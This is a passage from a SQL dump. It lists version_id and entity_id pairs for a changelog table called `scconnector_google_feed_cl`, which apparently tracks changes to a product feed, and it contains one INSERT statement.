(16058, 803),
(16059, 804),
(16060, 804),
(16061, 804),
(16062, 804),
(16063, 804),
(16064, 804),
(16065, 805),
(16066, 805),
(16067, 805),
(16068, 805),
(16069, 805),
(16070, 805),
(16071, 806),
(16072, 806),
(16073, 806),
(16074, 806),
(16075, 806),
(16076, 806),
(16077, 807),
(16078, 807),
(16079, 807),
(16080, 807),
(16081, 807),
(16082, 807),
(16083, 808),
(16084, 808),
(16085, 808),
(16086, 808),
(16087, 808),
(16088, 808),
(16089, 809),
(16090, 809),
(16091, 809),
(16092, 809),
(16093, 809),
(16094, 809),
(16095, 810),
(16096, 810),
(16097, 810),
(16098, 810),
(16099, 810),
(16100, 810),
(16101, 811),
(16102, 811),
(16103, 811),
(16104, 811),
(16105, 811),
(16106, 811),
(16107, 812),
(16108, 812),
(16109, 812),
(16110, 812),
(16111, 812),
(16112, 812),
(16113, 813),
(16114, 813),
(16115, 813),
(16116, 813),
(16117, 813),
(16118, 813),
(16119, 814),
(16120, 814),
(16121, 814),
(16122, 814),
(16123, 814),
(16124, 814),
(16125, 815),
(16126, 815),
(16127, 815),
(16128, 815),
(16129, 815),
(16130, 815),
(16131, 815),
(16132, 815),
(16133, 815),
(16134, 816),
(16135, 816),
(16136, 816),
(16137, 816),
(16138, 816),
(16139, 816),
(16140, 817),
(16141, 817),
(16142, 817),
(16143, 817),
(16144, 817),
(16145, 817),
(16146, 818),
(16147, 818),
(16148, 818),
(16149, 818),
(16150, 818),
(16151, 818),
(16152, 819),
(16153, 819),
(16154, 819),
(16155, 819),
(16156, 819),
(16157, 819),
(16158, 820),
(16159, 820),
(16160, 820),
(16161, 820),
(16162, 820),
(16163, 820),
(16164, 821),
(16165, 821),
(16166, 821),
(16167, 821),
(16168, 821),
(16169, 821),
(16170, 822),
(16171, 822),
(16172, 822),
(16173, 822),
(16174, 822),
(16175, 822),
(16176, 823),
(16177, 823),
(16178, 823),
(16179, 823),
(16180, 823),
(16181, 823),
(16182, 824),
(16183, 824),
(16184, 824),
(16185, 824),
(16186, 824),
(16187, 824),
(16188, 825),
(16189, 825),
(16190, 825),
(16191, 825),
(16192, 825),
(16193, 825),
(16194, 826),
(16195, 826),
(16196, 826),
(16197, 826),
(16198, 826),
(16199, 826),
(16200, 827),
(16201, 827),
(16202, 827),
(16203, 827),
(16204, 827),
(16205, 827),
(16206, 828),
(16207, 828),
(16208, 828),
(16209, 828),
(16210, 828),
(16211, 828),
(16212, 828),
(16213, 828),
(16214, 828),
(16215, 829),
(16216, 829),
(16217, 829),
(16218, 829),
(16219, 829),
(16220, 829),
(16221, 830),
(16222, 830),
(16223, 830),
(16224, 830),
(16225, 830),
(16226, 830),
(16227, 831),
(16228, 831),
(16229, 831),
(16230, 831),
(16231, 831),
(16232, 831),
(16233, 832),
(16234, 832),
(16235, 832),
(16236, 832),
(16237, 832),
(16238, 832),
(16239, 833),
(16240, 833),
(16241, 833),
(16242, 833),
(16243, 833),
(16244, 833),
(16245, 834),
(16246, 834),
(16247, 834),
(16248, 834),
(16249, 834),
(16250, 834),
(16251, 835),
(16252, 835),
(16253, 835),
(16254, 835),
(16255, 835),
(16256, 835),
(16257, 836),
(16258, 836),
(16259, 836),
(16260, 836),
(16261, 836),
(16262, 836),
(16263, 837),
(16264, 837),
(16265, 837),
(16266, 837),
(16267, 837),
(16268, 837),
(16269, 838),
(16270, 838),
(16271, 838),
(16272, 838),
(16273, 838),
(16274, 838),
(16275, 839),
(16276, 839),
(16277, 839),
(16278, 839),
(16279, 839),
(16280, 839),
(16281, 840),
(16282, 840),
(16283, 840),
(16284, 840),
(16285, 840),
(16286, 840),
(16287, 841),
(16288, 841),
(16289, 841),
(16290, 841),
(16291, 841),
(16292, 841),
(16293, 841),
(16294, 841),
(16295, 841),
(16296, 842),
(16297, 842),
(16298, 842),
(16299, 842),
(16300, 842),
(16301, 842),
(16302, 843),
(16303, 843),
(16304, 843),
(16305, 843),
(16306, 843),
(16307, 843),
(16308, 844),
(16309, 844),
(16310, 844),
(16311, 844),
(16312, 844),
(16313, 844),
(16314, 845),
(16315, 845),
(16316, 845),
(16317, 845),
(16318, 845),
(16319, 845),
(16320, 846),
(16321, 846),
(16322, 846),
(16323, 846),
(16324, 846),
(16325, 846),
(16326, 847),
(16327, 847),
(16328, 847),
(16329, 847),
(16330, 847),
(16331, 847),
(16332, 848),
(16333, 848),
(16334, 848),
(16335, 848),
(16336, 848),
(16337, 848),
(16338, 849),
(16339, 849),
(16340, 849),
(16341, 849),
(16342, 849),
(16343, 849),
(16344, 850),
(16345, 850),
(16346, 850),
(16347, 850),
(16348, 850),
(16349, 850),
(16350, 851),
(16351, 851),
(16352, 851),
(16353, 851),
(16354, 851),
(16355, 851),
(16356, 852),
(16357, 852),
(16358, 852),
(16359, 852),
(16360, 852),
(16361, 852),
(16362, 853),
(16363, 853),
(16364, 853),
(16365, 853),
(16366, 853),
(16367, 853),
(16368, 854),
(16369, 854),
(16370, 854),
(16371, 854),
(16372, 854),
(16373, 854),
(16374, 854),
(16375, 854),
(16376, 854),
(16377, 855),
(16378, 855),
(16379, 855),
(16380, 855),
(16381, 855),
(16382, 855),
(16383, 856),
(16384, 856),
(16385, 856),
(16386, 856),
(16387, 856),
(16388, 856),
(16389, 857),
(16390, 857),
(16391, 857),
(16392, 857),
(16393, 857),
(16394, 857),
(16395, 858),
(16396, 858),
(16397, 858),
(16398, 858),
(16399, 858),
(16400, 858),
(16401, 859),
(16402, 859),
(16403, 859),
(16404, 859),
(16405, 859),
(16406, 859),
(16407, 760),
(16408, 760),
(16409, 761),
(16410, 761),
(16411, 762),
(16412, 762),
(16413, 763),
(16414, 764),
(16415, 764),
(16416, 765),
(16417, 765),
(16418, 766),
(16419, 766),
(16420, 767),
(16421, 767),
(16422, 768),
(16423, 768),
(16424, 769),
(16425, 769),
(16426, 770),
(16427, 770),
(16428, 771),
(16429, 771),
(16430, 772),
(16431, 772),
(16432, 773),
(16433, 773),
(16434, 774),
(16435, 774),
(16436, 775),
(16437, 775),
(16438, 776),
(16439, 777),
(16440, 777),
(16441, 778),
(16442, 778),
(16443, 779),
(16444, 779),
(16445, 780),
(16446, 780),
(16447, 781),
(16448, 781),
(16449, 782),
(16450, 782),
(16451, 783),
(16452, 783),
(16453, 784),
(16454, 784),
(16455, 785),
(16456, 785),
(16457, 786),
(16458, 786),
(16459, 787),
(16460, 787),
(16461, 788),
(16462, 788),
(16463, 789),
(16464, 790),
(16465, 790),
(16466, 791),
(16467, 791),
(16468, 792),
(16469, 792),
(16470, 793),
(16471, 793),
(16472, 794),
(16473, 794),
(16474, 795),
(16475, 795),
(16476, 796),
(16477, 796),
(16478, 797),
(16479, 797),
(16480, 798),
(16481, 798),
(16482, 799),
(16483, 799),
(16484, 800),
(16485, 800),
(16486, 801),
(16487, 801),
(16488, 802),
(16489, 803),
(16490, 803),
(16491, 804),
(16492, 804),
(16493, 805),
(16494, 805),
(16495, 806),
(16496, 806),
(16497, 807),
(16498, 807),
(16499, 808),
(16500, 808),
(16501, 809),
(16502, 809),
(16503, 810),
(16504, 810),
(16505, 811),
(16506, 811),
(16507, 812),
(16508, 812),
(16509, 813),
(16510, 813),
(16511, 814),
(16512, 814),
(16513, 815),
(16514, 816),
(16515, 816),
(16516, 817),
(16517, 817),
(16518, 818),
(16519, 818),
(16520, 819),
(16521, 819),
(16522, 820),
(16523, 820),
(16524, 821),
(16525, 821),
(16526, 822),
(16527, 822),
(16528, 823),
(16529, 823),
(16530, 824),
(16531, 824),
(16532, 825),
(16533, 825),
(16534, 826),
(16535, 826),
(16536, 827),
(16537, 827),
(16538, 828),
(16539, 829),
(16540, 829),
(16541, 830),
(16542, 830),
(16543, 831),
(16544, 831),
(16545, 832),
(16546, 832),
(16547, 833),
(16548, 833),
(16549, 834),
(16550, 834),
(16551, 835),
(16552, 835),
(16553, 836),
(16554, 836),
(16555, 837),
(16556, 837),
(16557, 838),
(16558, 838),
(16559, 839),
(16560, 839),
(16561, 840),
(16562, 840),
(16563, 841),
(16564, 842),
(16565, 842),
(16566, 843),
(16567, 843),
(16568, 844),
(16569, 844),
(16570, 845),
(16571, 845),
(16572, 846),
(16573, 846),
(16574, 847),
(16575, 847),
(16576, 848),
(16577, 848),
(16578, 849),
(16579, 849),
(16580, 850),
(16581, 850),
(16582, 851),
(16583, 851),
(16584, 852),
(16585, 852),
(16586, 853),
(16587, 853),
(16588, 854),
(16589, 855),
(16590, 855),
(16591, 856),
(16592, 856),
(16593, 857),
(16594, 857),
(16595, 858),
(16596, 858),
(16597, 859),
(16598, 859),
(16599, 860),
(16600, 861),
(16601, 862),
(16602, 863),
(16603, 864),
(16604, 865),
(16605, 866),
(16606, 867),
(16607, 868),
(16608, 869),
(16609, 870),
(16610, 871),
(16611, 872),
(16612, 873),
(16613, 874),
(16614, 875),
(16615, 876),
(16616, 877),
(16617, 878),
(16618, 879),
(16619, 880),
(16620, 881),
(16621, 882),
(16622, 883),
(16623, 884),
(16624, 885),
(16625, 886),
(16626, 887),
(16627, 888),
(16628, 889),
(16629, 890),
(16630, 891),
(16631, 892),
(16632, 893),
(16633, 894),
(16634, 895),
(16635, 896),
(16636, 897),
(16637, 898),
(16638, 899),
(16639, 900),
(16640, 901),
(16641, 902),
(16642, 903),
(16643, 904),
(16644, 905),
(16645, 906),
(16646, 907),
(16647, 908),
(16648, 909),
(16649, 910),
(16650, 911),
(16651, 912),
(16652, 913),
(16653, 914),
(16654, 915),
(16655, 916),
(16656, 917),
(16657, 918),
(16658, 919),
(16659, 920),
(16660, 921),
(16661, 922),
(16662, 923),
(16663, 924),
(16664, 925),
(16665, 926),
(16666, 927),
(16667, 928),
(16668, 929),
(16669, 930),
(16670, 931),
(16671, 932),
(16672, 933),
(16673, 934),
(16674, 935),
(16675, 936),
(16676, 937),
(16677, 938),
(16678, 939),
(16679, 940),
(16680, 941),
(16681, 942),
(16682, 943),
(16683, 944),
(16684, 945),
(16685, 946),
(16686, 947),
(16687, 948),
(16688, 949),
(16689, 950),
(16690, 951),
(16691, 952),
(16692, 953),
(16693, 954),
(16694, 955),
(16695, 956),
(16696, 957),
(16697, 958),
(16698, 959),
(16699, 860),
(16700, 861),
(16701, 861),
(16702, 861),
(16703, 862),
(16704, 863),
(16705, 864),
(16706, 864),
(16707, 864),
(16708, 865),
(16709, 866),
(16710, 867),
(16711, 867),
(16712, 867),
(16713, 868),
(16714, 869),
(16715, 869),
(16716, 869),
(16717, 870),
(16718, 871),
(16719, 872),
(16720, 872),
(16721, 872),
(16722, 873),
(16723, 874),
(16724, 875),
(16725, 875),
(16726, 875),
(16727, 876),
(16728, 877),
(16729, 878),
(16730, 878),
(16731, 878),
(16732, 879),
(16733, 880),
(16734, 880),
(16735, 880),
(16736, 881),
(16737, 881),
(16738, 882),
(16739, 883),
(16740, 884),
(16741, 884),
(16742, 885),
(16743, 886),
(16744, 887),
(16745, 887),
(16746, 888),
(16747, 889),
(16748, 890),
(16749, 890),
(16750, 891),
(16751, 892),
(16752, 893),
(16753, 893),
(16754, 894),
(16755, 895),
(16756, 895),
(16757, 896),
(16758, 897),
(16759, 898),
(16760, 898),
(16761, 899),
(16762, 900),
(16763, 901),
(16764, 901),
(16765, 902),
(16766, 903),
(16767, 904),
(16768, 904),
(16769, 905),
(16770, 906),
(16771, 906),
(16772, 907),
(16773, 907),
(16774, 907),
(16775, 908),
(16776, 908),
(16777, 908),
(16778, 909),
(16779, 909),
(16780, 909),
(16781, 910),
(16782, 910),
(16783, 910),
(16784, 911),
(16785, 911),
(16786, 911),
(16787, 912),
(16788, 913),
(16789, 913),
(16790, 913),
(16791, 914),
(16792, 915),
(16793, 916),
(16794, 916),
(16795, 916),
(16796, 917),
(16797, 918),
(16798, 919),
(16799, 919),
(16800, 919),
(16801, 920),
(16802, 921),
(16803, 922),
(16804, 922),
(16805, 922),
(16806, 923),
(16807, 924),
(16808, 924),
(16809, 924),
(16810, 925),
(16811, 925),
(16812, 926),
(16813, 927),
(16814, 928),
(16815, 928),
(16816, 929),
(16817, 930),
(16818, 931),
(16819, 931),
(16820, 932),
(16821, 933),
(16822, 934),
(16823, 934),
(16824, 935),
(16825, 936),
(16826, 937),
(16827, 937),
(16828, 938),
(16829, 939),
(16830, 940),
(16831, 940),
(16832, 940),
(16833, 941),
(16834, 942),
(16835, 943),
(16836, 943),
(16837, 943),
(16838, 944),
(16839, 945),
(16840, 946),
(16841, 946),
(16842, 946),
(16843, 947),
(16844, 948),
(16845, 949),
(16846, 949),
(16847, 949),
(16848, 950),
(16849, 950),
(16850, 950),
(16851, 951),
(16852, 952),
(16853, 952),
(16854, 952),
(16855, 953),
(16856, 954),
(16857, 955),
(16858, 955),
(16859, 955),
(16860, 956),
(16861, 957),
(16862, 958),
(16863, 958),
(16864, 958),
(16865, 959),
(16866, 860),
(16867, 860),
(16868, 860),
(16869, 860),
(16870, 860),
(16871, 860),
(16872, 860),
(16873, 861),
(16874, 861),
(16875, 861),
(16876, 861),
(16877, 861),
(16878, 861),
(16879, 861),
(16880, 862),
(16881, 862),
(16882, 862),
(16883, 862),
(16884, 862),
(16885, 862),
(16886, 862),
(16887, 863),
(16888, 863),
(16889, 863),
(16890, 863),
(16891, 863),
(16892, 863),
(16893, 863),
(16894, 864),
(16895, 864),
(16896, 864),
(16897, 864),
(16898, 864),
(16899, 864),
(16900, 864),
(16901, 865),
(16902, 865),
(16903, 865),
(16904, 865),
(16905, 865),
(16906, 865),
(16907, 865),
(16908, 866),
(16909, 866),
(16910, 866),
(16911, 866),
(16912, 866),
(16913, 866),
(16914, 866),
(16915, 867),
(16916, 867),
(16917, 867),
(16918, 867),
(16919, 867),
(16920, 867),
(16921, 867),
(16922, 867),
(16923, 867),
(16924, 867),
(16925, 867),
(16926, 868),
(16927, 868),
(16928, 868),
(16929, 868),
(16930, 868),
(16931, 868),
(16932, 868),
(16933, 869),
(16934, 869),
(16935, 869),
(16936, 869),
(16937, 869),
(16938, 869),
(16939, 869),
(16940, 870),
(16941, 870),
(16942, 870),
(16943, 870),
(16944, 870),
(16945, 870),
(16946, 870),
(16947, 871),
(16948, 871),
(16949, 871),
(16950, 871),
(16951, 871),
(16952, 871),
(16953, 871),
(16954, 872),
(16955, 872),
(16956, 872),
(16957, 872),
(16958, 872),
(16959, 872),
(16960, 872),
(16961, 873),
(16962, 873),
(16963, 873),
(16964, 873),
(16965, 873),
(16966, 873),
(16967, 873),
(16968, 874),
(16969, 874),
(16970, 874),
(16971, 874),
(16972, 874),
(16973, 874),
(16974, 874),
(16975, 875),
(16976, 875),
(16977, 875),
(16978, 875),
(16979, 875),
(16980, 875),
(16981, 875),
(16982, 876),
(16983, 876),
(16984, 876),
(16985, 876),
(16986, 876),
(16987, 876),
(16988, 876),
(16989, 877),
(16990, 877),
(16991, 877),
(16992, 877),
(16993, 877),
(16994, 877),
(16995, 877),
(16996, 878),
(16997, 878),
(16998, 878),
(16999, 878),
(17000, 878),
(17001, 878),
(17002, 878),
(17003, 879),
(17004, 879),
(17005, 879),
(17006, 879),
(17007, 879),
(17008, 879),
(17009, 879),
(17010, 880),
(17011, 880),
(17012, 880),
(17013, 880),
(17014, 880),
(17015, 880),
(17016, 880),
(17017, 880),
(17018, 880),
(17019, 880),
(17020, 880),
(17021, 881),
(17022, 881),
(17023, 881),
(17024, 881),
(17025, 881),
(17026, 881),
(17027, 881),
(17028, 882),
(17029, 882),
(17030, 882),
(17031, 882),
(17032, 882),
(17033, 882),
(17034, 882),
(17035, 883),
(17036, 883),
(17037, 883),
(17038, 883),
(17039, 883),
(17040, 883),
(17041, 883),
(17042, 884),
(17043, 884),
(17044, 884),
(17045, 884),
(17046, 884),
(17047, 884),
(17048, 884),
(17049, 885),
(17050, 885),
(17051, 885),
(17052, 885),
(17053, 885),
(17054, 885),
(17055, 885),
(17056, 886),
(17057, 886),
(17058, 886),
(17059, 886),
(17060, 886),
(17061, 886),
(17062, 886),
(17063, 887),
(17064, 887),
(17065, 887),
(17066, 887),
(17067, 887),
(17068, 887),
(17069, 887),
(17070, 888),
(17071, 888),
(17072, 888),
(17073, 888),
(17074, 888),
(17075, 888),
(17076, 888),
(17077, 889),
(17078, 889),
(17079, 889),
(17080, 889),
(17081, 889),
(17082, 889),
(17083, 889),
(17084, 890),
(17085, 890),
(17086, 890),
(17087, 890),
(17088, 890),
(17089, 890),
(17090, 890),
(17091, 891),
(17092, 891),
(17093, 891),
(17094, 891),
(17095, 891),
(17096, 891),
(17097, 891),
(17098, 892),
(17099, 892),
(17100, 892),
(17101, 892),
(17102, 892),
(17103, 892),
(17104, 892),
(17105, 893),
(17106, 893),
(17107, 893),
(17108, 893),
(17109, 893),
(17110, 893),
(17111, 893),
(17112, 893),
(17113, 893),
(17114, 893),
(17115, 893),
(17116, 894),
(17117, 894),
(17118, 894),
(17119, 894),
(17120, 894),
(17121, 894),
(17122, 894),
(17123, 895),
(17124, 895),
(17125, 895),
(17126, 895),
(17127, 895),
(17128, 895),
(17129, 895),
(17130, 896),
(17131, 896),
(17132, 896),
(17133, 896),
(17134, 896),
(17135, 896),
(17136, 896),
(17137, 897),
(17138, 897),
(17139, 897),
(17140, 897),
(17141, 897),
(17142, 897),
(17143, 897),
(17144, 898),
(17145, 898),
(17146, 898),
(17147, 898),
(17148, 898),
(17149, 898),
(17150, 898),
(17151, 899),
(17152, 899),
(17153, 899),
(17154, 899),
(17155, 899),
(17156, 899),
(17157, 899),
(17158, 900),
(17159, 900),
(17160, 900),
(17161, 900),
(17162, 900),
(17163, 900),
(17164, 900),
(17165, 901),
(17166, 901),
(17167, 901),
(17168, 901),
(17169, 901),
(17170, 901),
(17171, 901),
(17172, 902),
(17173, 902),
(17174, 902),
(17175, 902),
(17176, 902),
(17177, 902),
(17178, 902),
(17179, 903),
(17180, 903),
(17181, 903),
(17182, 903),
(17183, 903),
(17184, 903),
(17185, 903),
(17186, 904),
(17187, 904),
(17188, 904),
(17189, 904),
(17190, 904),
(17191, 904),
(17192, 904),
(17193, 905),
(17194, 905),
(17195, 905),
(17196, 905),
(17197, 905),
(17198, 905),
(17199, 905),
(17200, 906),
(17201, 906),
(17202, 906),
(17203, 906),
(17204, 906),
(17205, 906),
(17206, 906),
(17207, 906),
(17208, 906),
(17209, 906),
(17210, 906),
(17211, 907),
(17212, 907),
(17213, 907),
(17214, 907),
(17215, 907),
(17216, 907),
(17217, 907),
(17218, 908),
(17219, 908),
(17220, 908),
(17221, 908),
(17222, 908),
(17223, 908),
(17224, 908),
(17225, 909),
(17226, 909),
(17227, 909),
(17228, 909),
(17229, 909),
(17230, 909),
(17231, 909),
(17232, 910),
(17233, 910),
(17234, 910),
(17235, 910),
(17236, 910),
(17237, 910),
(17238, 910),
(17239, 911),
(17240, 911),
(17241, 911),
(17242, 911),
(17243, 911),
(17244, 911),
(17245, 911),
(17246, 911),
(17247, 911),
(17248, 911),
(17249, 911),
(17250, 912),
(17251, 912),
(17252, 912),
(17253, 912),
(17254, 912),
(17255, 912),
(17256, 912),
(17257, 913),
(17258, 913),
(17259, 913),
(17260, 913),
(17261, 913),
(17262, 913),
(17263, 913),
(17264, 914),
(17265, 914),
(17266, 914),
(17267, 914),
(17268, 914),
(17269, 914),
(17270, 914),
(17271, 915),
(17272, 915),
(17273, 915),
(17274, 915),
(17275, 915),
(17276, 915),
(17277, 915),
(17278, 916),
(17279, 916),
(17280, 916),
(17281, 916),
(17282, 916),
(17283, 916),
(17284, 916),
(17285, 917),
(17286, 917),
(17287, 917),
(17288, 917),
(17289, 917),
(17290, 917),
(17291, 917),
(17292, 918),
(17293, 918),
(17294, 918),
(17295, 918),
(17296, 918),
(17297, 918),
(17298, 918),
(17299, 919),
(17300, 919),
(17301, 919),
(17302, 919),
(17303, 919),
(17304, 919),
(17305, 919),
(17306, 920),
(17307, 920),
(17308, 920),
(17309, 920),
(17310, 920),
(17311, 920),
(17312, 920),
(17313, 921),
(17314, 921),
(17315, 921),
(17316, 921),
(17317, 921),
(17318, 921),
(17319, 921),
(17320, 922),
(17321, 922),
(17322, 922),
(17323, 922),
(17324, 922),
(17325, 922),
(17326, 922),
(17327, 923),
(17328, 923),
(17329, 923),
(17330, 923),
(17331, 923),
(17332, 923),
(17333, 923),
(17334, 924),
(17335, 924),
(17336, 924),
(17337, 924),
(17338, 924),
(17339, 924),
(17340, 924),
(17341, 924),
(17342, 924),
(17343, 924),
(17344, 924),
(17345, 925),
(17346, 925),
(17347, 925),
(17348, 925),
(17349, 925),
(17350, 925),
(17351, 925),
(17352, 926),
(17353, 926),
(17354, 926),
(17355, 926),
(17356, 926),
(17357, 926),
(17358, 926),
(17359, 927),
(17360, 927),
(17361, 927),
(17362, 927),
(17363, 927),
(17364, 927),
(17365, 927),
(17366, 928),
(17367, 928),
(17368, 928),
(17369, 928),
(17370, 928),
(17371, 928),
(17372, 928),
(17373, 929),
(17374, 929),
(17375, 929),
(17376, 929),
(17377, 929),
(17378, 929),
(17379, 929),
(17380, 930),
(17381, 930),
(17382, 930),
(17383, 930),
(17384, 930),
(17385, 930),
(17386, 930),
(17387, 931),
(17388, 931),
(17389, 931),
(17390, 931),
(17391, 931),
(17392, 931),
(17393, 931),
(17394, 932),
(17395, 932),
(17396, 932),
(17397, 932),
(17398, 932),
(17399, 932),
(17400, 932),
(17401, 933),
(17402, 933),
(17403, 933),
(17404, 933),
(17405, 933),
(17406, 933),
(17407, 933),
(17408, 934),
(17409, 934),
(17410, 934),
(17411, 934),
(17412, 934),
(17413, 934),
(17414, 934),
(17415, 935),
(17416, 935),
(17417, 935),
(17418, 935),
(17419, 935),
(17420, 935),
(17421, 935),
(17422, 936),
(17423, 936),
(17424, 936),
(17425, 936),
(17426, 936),
(17427, 936),
(17428, 936),
(17429, 937),
(17430, 937),
(17431, 937),
(17432, 937),
(17433, 937),
(17434, 937),
(17435, 937),
(17436, 937),
(17437, 937),
(17438, 937),
(17439, 937),
(17440, 938),
(17441, 938),
(17442, 938),
(17443, 938),
(17444, 938),
(17445, 938),
(17446, 938),
(17447, 939),
(17448, 939),
(17449, 939),
(17450, 939),
(17451, 939),
(17452, 939),
(17453, 939),
(17454, 940),
(17455, 940),
(17456, 940),
(17457, 940),
(17458, 940),
(17459, 940),
(17460, 940),
(17461, 941),
(17462, 941),
(17463, 941),
(17464, 941),
(17465, 941),
(17466, 941),
(17467, 941),
(17468, 942),
(17469, 942),
(17470, 942),
(17471, 942),
(17472, 942),
(17473, 942),
(17474, 942),
(17475, 943),
(17476, 943),
(17477, 943),
(17478, 943),
(17479, 943),
(17480, 943),
(17481, 943),
(17482, 944),
(17483, 944),
(17484, 944),
(17485, 944),
(17486, 944),
(17487, 944),
(17488, 944),
(17489, 945),
(17490, 945),
(17491, 945),
(17492, 945),
(17493, 945),
(17494, 945),
(17495, 945),
(17496, 946),
(17497, 946),
(17498, 946),
(17499, 946),
(17500, 946),
(17501, 946),
(17502, 946),
(17503, 947),
(17504, 947),
(17505, 947),
(17506, 947),
(17507, 947),
(17508, 947),
(17509, 947),
(17510, 948),
(17511, 948),
(17512, 948),
(17513, 948),
(17514, 948),
(17515, 948),
(17516, 948),
(17517, 949),
(17518, 949),
(17519, 949),
(17520, 949),
(17521, 949),
(17522, 949),
(17523, 949),
(17524, 950),
(17525, 950),
(17526, 950),
(17527, 950),
(17528, 950),
(17529, 950),
(17530, 950),
(17531, 950),
(17532, 950),
(17533, 950),
(17534, 950),
(17535, 951),
(17536, 951),
(17537, 951),
(17538, 951),
(17539, 951),
(17540, 951),
(17541, 951),
(17542, 952),
(17543, 952),
(17544, 952),
(17545, 952),
(17546, 952),
(17547, 952),
(17548, 952),
(17549, 953),
(17550, 953),
(17551, 953),
(17552, 953),
(17553, 953),
(17554, 953),
(17555, 953),
(17556, 954),
(17557, 954),
(17558, 954),
(17559, 954),
(17560, 954),
(17561, 954),
(17562, 954),
(17563, 955),
(17564, 955),
(17565, 955),
(17566, 955),
(17567, 955),
(17568, 955),
(17569, 955),
(17570, 956),
(17571, 956),
(17572, 956),
(17573, 956),
(17574, 956),
(17575, 956),
(17576, 956),
(17577, 957),
(17578, 957),
(17579, 957),
(17580, 957),
(17581, 957),
(17582, 957),
(17583, 957),
(17584, 958),
(17585, 958),
(17586, 958),
(17587, 958),
(17588, 958),
(17589, 958),
(17590, 958),
(17591, 959),
(17592, 959),
(17593, 959),
(17594, 959),
(17595, 959),
(17596, 959),
(17597, 959),
(17598, 860),
(17599, 861),
(17600, 862),
(17601, 863),
(17602, 864),
(17603, 865),
(17604, 866),
(17605, 867),
(17606, 868),
(17607, 869),
(17608, 870),
(17609, 871),
(17610, 872),
(17611, 873),
(17612, 874),
(17613, 875),
(17614, 876),
(17615, 877),
(17616, 878),
(17617, 879),
(17618, 880),
(17619, 881),
(17620, 882),
(17621, 883),
(17622, 884),
(17623, 885),
(17624, 886),
(17625, 887),
(17626, 888),
(17627, 889),
(17628, 890),
(17629, 891),
(17630, 892),
(17631, 893),
(17632, 894),
(17633, 895),
(17634, 896),
(17635, 897),
(17636, 898),
(17637, 899),
(17638, 900),
(17639, 901),
(17640, 902),
(17641, 903),
(17642, 904),
(17643, 905),
(17644, 906),
(17645, 907),
(17646, 908),
(17647, 909),
(17648, 910),
(17649, 911),
(17650, 912),
(17651, 913),
(17652, 914),
(17653, 915),
(17654, 916),
(17655, 917),
(17656, 918),
(17657, 919),
(17658, 920),
(17659, 921),
(17660, 922),
(17661, 923),
(17662, 924),
(17663, 925),
(17664, 926),
(17665, 927),
(17666, 928),
(17667, 929),
(17668, 930),
(17669, 931),
(17670, 932),
(17671, 933),
(17672, 934),
(17673, 935),
(17674, 936),
(17675, 937),
(17676, 938),
(17677, 939),
(17678, 940),
(17679, 941),
(17680, 942),
(17681, 943),
(17682, 944),
(17683, 945),
(17684, 946),
(17685, 947),
(17686, 948),
(17687, 949),
(17688, 950),
(17689, 951),
(17690, 952),
(17691, 953),
(17692, 954),
(17693, 955),
(17694, 956),
(17695, 957),
(17696, 958),
(17697, 959),
(17698, 860),
(17699, 860),
(17700, 860),
(17701, 860),
(17702, 860),
(17703, 860),
(17704, 861),
(17705, 861),
(17706, 861),
(17707, 861),
(17708, 861),
(17709, 861),
(17710, 862),
(17711, 862),
(17712, 862),
(17713, 862),
(17714, 862),
(17715, 862),
(17716, 863),
(17717, 863),
(17718, 863),
(17719, 863),
(17720, 863),
(17721, 863),
(17722, 864),
(17723, 864),
(17724, 864),
(17725, 864),
(17726, 864),
(17727, 864),
(17728, 865),
(17729, 865),
(17730, 865),
(17731, 865),
(17732, 865),
(17733, 865),
(17734, 866),
(17735, 866),
(17736, 866),
(17737, 866),
(17738, 866),
(17739, 866),
(17740, 867),
(17741, 867),
(17742, 867),
(17743, 867),
(17744, 867),
(17745, 867),
(17746, 867),
(17747, 867),
(17748, 867),
(17749, 868),
(17750, 868),
(17751, 868),
(17752, 868),
(17753, 868),
(17754, 868),
(17755, 869),
(17756, 869),
(17757, 869),
(17758, 869),
(17759, 869),
(17760, 869),
(17761, 870),
(17762, 870),
(17763, 870),
(17764, 870),
(17765, 870),
(17766, 870),
(17767, 871),
(17768, 871),
(17769, 871),
(17770, 871),
(17771, 871),
(17772, 871),
(17773, 872),
(17774, 872),
(17775, 872),
(17776, 872),
(17777, 872),
(17778, 872),
(17779, 873),
(17780, 873),
(17781, 873),
(17782, 873),
(17783, 873),
(17784, 873),
(17785, 874),
(17786, 874),
(17787, 874),
(17788, 874),
(17789, 874),
(17790, 874),
(17791, 875),
(17792, 875),
(17793, 875),
(17794, 875),
(17795, 875),
(17796, 875),
(17797, 876),
(17798, 876),
(17799, 876),
(17800, 876),
(17801, 876),
(17802, 876),
(17803, 877),
(17804, 877),
(17805, 877),
(17806, 877),
(17807, 877),
(17808, 877),
(17809, 878),
(17810, 878),
(17811, 878),
(17812, 878),
(17813, 878),
(17814, 878),
(17815, 879),
(17816, 879),
(17817, 879),
(17818, 879),
(17819, 879),
(17820, 879),
(17821, 880),
(17822, 880),
(17823, 880),
(17824, 880),
(17825, 880),
(17826, 880),
(17827, 880);
INSERT INTO `scconnector_google_feed_cl` (`version_id`, `entity_id`) VALUES
(17828, 880),
(17829, 880),
(17830, 881),
(17831, 881),
(17832, 881),
(17833, 881),
(17834, 881),
(17835, 881),
(17836, 882),
(17837, 882),
(17838, 882),
(17839, 882),
(17840, 882),
(17841, 882),
(17842, 883),
(17843, 883),
(17844, 883),
(17845, 883),
(17846, 883),
(17847, 883),
(17848, 884),
(17849, 884),
(17850, 884),
(17851, 884),
(17852, 884),
(17853, 884),
(17854, 885),
(17855, 885),
(17856, 885),
(17857, 885),
(17858, 885),
(17859, 885),
(17860, 886),
(17861, 886),
(17862, 886),
(17863, 886),
(17864, 886),
(17865, 886),
(17866, 887),
(17867, 887),
(17868, 887),
(17869, 887),
(17870, 887),
(17871, 887),
(17872, 888),
(17873, 888),
(17874, 888),
(17875, 888),
(17876, 888),
(17877, 888),
(17878, 889),
(17879, 889),
(17880, 889),
(17881, 889),
(17882, 889),
(17883, 889),
(17884, 890),
(17885, 890),
(17886, 890),
(17887, 890),
(17888, 890),
(17889, 890),
(17890, 891),
(17891, 891),
(17892, 891),
(17893, 891),
(17894, 891),
(17895, 891),
(17896, 892),
(17897, 892),
(17898, 892),
(17899, 892),
(17900, 892),
(17901, 892),
(17902, 893),
(17903, 893),
(17904, 893),
(17905, 893),
(17906, 893),
(17907, 893),
(17908, 893),
(17909, 893),
(17910, 893),
(17911, 894),
(17912, 894),
(17913, 894),
(17914, 894),
(17915, 894),
(17916, 894),
(17917, 895),
(17918, 895),
(17919, 895),
(17920, 895),
(17921, 895),
(17922, 895),
(17923, 896),
(17924, 896),
(17925, 896),
(17926, 896),
(17927, 896),
